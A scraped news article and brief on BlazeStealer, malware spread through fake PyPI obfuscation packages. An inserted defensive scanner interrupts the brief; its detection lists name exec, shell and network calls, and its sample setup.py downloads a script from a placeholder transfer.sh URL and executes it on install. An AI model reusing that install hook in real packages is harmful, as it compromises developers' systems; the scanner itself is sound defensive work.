Article Details

Scrape Timestamp (UTC): 2023-11-08 12:59:56.711

Source: https://thehackernews.com/2023/11/beware-developers-blazestealer-malware.html

Original Article Text


Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

A new set of malicious Python packages has slithered its way into the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems.

The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News.

"[BlazeStealer] retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim's computer," security researcher Yehuda Gelb said.

The campaign, which commenced in January 2023, entails a total of eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the last of which was published in October.

These modules come with setup.py and __init__.py files that are designed to retrieve a Python script hosted on transfer[.]sh, which is executed immediately upon their installation.

Called BlazeStealer, the malware runs a Discord bot and enables the threat actor to harvest a wide range of information, including passwords from web browsers and screenshots, execute arbitrary commands, encrypt files, and deactivate Microsoft Defender Antivirus on the infected host.

What's more, it can render the computer unusable by ramping up CPU usage, inserting a Windows Batch script in the startup directory to shut down the machine, and even forcing a blue screen of death (BSoD) error.

"It stands to reason that developers engaged in code obfuscation are likely dealing with valuable and sensitive information, and therefore, to a hacker, this translates to a target worth pursuing," Gelb noted.

A majority of downloads associated with the rogue packages originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being taken down.

"The open-source domain remains a fertile ground for innovation, but it demands caution," Gelb said. "Developers must remain vigilant, and vet the packages prior to consumption."

Daily Brief Summary

MALWARE // BlazeStealer Malware Discovered in Python Packages on PyPI Poses Threat to Developer Systems

A report from Checkmarx revealed the existence of a new form of malware called BlazeStealer in seemingly harmless Python packages on the Python Package Index (PyPI) repository. The malware aims to steal sensitive information from compromised developer systems.

Since January 2023, eight malicious packages have been detected on PyPI, with the latest released in October. When installed, the packages retrieve a Python script from transfer[.]sh that is executed immediately, launching the malware's Discord bot.
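One practical form of the vetting that both the article and this brief call for, as an added example (not Checkmarx's tooling and not the malicious packages' own code): a static scanner that parses a candidate package's setup.py or __init__.py and flags the install-time fetch-and-execute pattern described above, i.e. a setuptools install hook combined with a URL fetch and exec(). The two sample setup.py sources inside the block are constructed for illustration only, and the transfer.sh URL in the second is a placeholder, not a real payload location.

```python
"""Static triage of a package's setup.py / __init__.py for the install-time
fetch-and-execute pattern described above. Added example: not Checkmarx's tooling
and not the malicious packages' own code. Both sample sources are constructed; the
transfer.sh URL is a placeholder, not a real payload location."""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Dotted call names that have no business running during `pip install`. Bare names
# cover `from urllib.request import urlopen` style imports.
INDICATORS = {
    "exec": "dynamic-exec", "eval": "dynamic-exec",
    "urllib.request.urlopen": "network-fetch", "urlopen": "network-fetch",
    "urllib.request.urlretrieve": "network-fetch", "urlretrieve": "network-fetch",
    "requests.get": "network-fetch", "requests.post": "network-fetch",
    "os.system": "shell-exec", "os.popen": "shell-exec", "subprocess.Popen": "shell-exec",
    "subprocess.run": "shell-exec", "subprocess.call": "shell-exec",
    "subprocess.check_output": "shell-exec",
    "base64.b64decode": "obfuscation", "b64decode": "obfuscation",
    "zlib.decompress": "obfuscation", "marshal.loads": "obfuscation",
}
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py"}  # setuptools hooks
SUSPICIOUS_HOSTS = ("transfer.sh", "pastebin.com", "discord.com/api/webhooks")
BLOCKING_KINDS = {"dynamic-exec", "network-fetch", "shell-exec"}


@dataclass(frozen=True)
class Finding:
    kind: str
    line: int
    detail: str


def _dotted_name(node: ast.expr) -> str:
    """Flatten a call target: os.system -> 'os.system', exec -> 'exec', else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""  # call on the result of another expression; not a static name


def scan_setup_source(source: str) -> list[Finding]:
    """Parse setup.py / __init__.py text and report install-time execution indicators."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in INDICATORS:
                findings.append(Finding(INDICATORS[name], node.lineno, f"call to {name}()"))
            # cmdclass= wires a custom command class into `pip install` itself.
            if name in ("setup", "setuptools.setup") and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append(Finding("install-hook", node.lineno, "setup(cmdclass=...) overrides an install step"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = _dotted_name(base).rsplit(".", 1)[-1]
                if base_name in INSTALL_COMMANDS:
                    findings.append(Finding("install-hook", node.lineno,
                                            f"class {node.name} subclasses setuptools '{base_name}'"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for host in SUSPICIOUS_HOSTS:
                if host in node.value:
                    findings.append(Finding("suspicious-host", node.lineno, node.value))
    return sorted(findings, key=lambda f: f.line)


def should_block(findings: list[Finding]) -> bool:
    """Fetching, executing or shelling out during install is enough to hold the package."""
    return any(f.kind in BLOCKING_KINDS for f in findings)


# Constructed sample: an ordinary setup.py with no install-time side effects.
BENIGN_SETUP = """\
from setuptools import setup, find_packages

setup(name="example-tool", version="1.0.0", packages=find_packages(),
      install_requires=["click>=8.0"])
"""

# Constructed sample modelled only on the report's description of the pattern.
SUSPICIOUS_SETUP = """\
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        stage2 = urllib.request.urlopen("https://transfer.sh/placeholder/stage2.py").read()
        exec(stage2)

setup(name="pyobf-example", version="0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        findings = scan_setup_source(src)
        print(f"{label}: block={should_block(findings)}")
        for f in findings:
            print(f"  line {f.line}: {f.kind}: {f.detail}")
```

Run it against a source distribution rather than a wheel: `pip download --no-deps --no-binary :all: <package>` fetches the sdist without installing it, and pip only executes setup.py for sdists. A wheel-only policy (`pip install --only-binary :all:`) therefore removes this particular install-time hook, though a malicious `__init__.py` still runs the first time the package is imported, which is why the scanner reads that file too.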

The bot lets the threat actor gather information such as web browser passwords and screenshots, execute arbitrary commands, encrypt files, and disable Microsoft Defender Antivirus on the infected system. It can also drive CPU usage up, drop a Windows Batch script in the startup directory to shut down the machine, and even trigger a blue screen of death error.

The majority of the rogue package downloads were traced back to the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being removed.

Checkmarx recommends that developers vet packages before consumption, noting that the open-source domain, while fertile ground for innovation, demands caution.